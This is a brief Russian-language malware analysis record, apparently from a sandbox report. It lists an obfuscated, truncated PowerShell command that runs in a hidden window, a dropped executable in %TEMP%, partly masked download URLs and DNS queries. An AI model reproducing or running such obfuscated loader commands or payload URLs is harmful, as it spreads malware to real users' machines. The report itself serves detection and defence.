Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -JoIn('40K97j88j71,49t98%105&123!33,99t110o102%105K111K120~44,66t105%120,34t91~105K110,79~96o101j105t98j120&55o40~70,78t123&49,43j100%120%120@124K54@35@35t123!123!123o34~111o100o101%116t107&34o...
- %TEMP%\417.exe
- %TEMP%\417.exe
- 'ch##g.com':80
- 're##ire.us':80
- '12#.#55.197.12':80
- 'wh####ousela.com':80
- http://www.ch##g.com/hciyoer/U/
- http://re##ire.us/wordprss/hSbhW/
- http://www.wh####ousela.com/pBwINgH8/
- DNS ASK ch##g.com
- DNS ASK ba##e.org
- DNS ASK re##ire.us
- DNS ASK wh####ousela.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -JoIn('40K97j88j71,49t98%105&123!33,99t110o102%105K111K120~44,66t105%120,34t91~105K110,79~96o101j105t98j120&55o40~70,78t123&49,43j100%120%120@124K54@35@35t123!123!123o34~111o100o101%116t107&34o...' (со скрытым окном)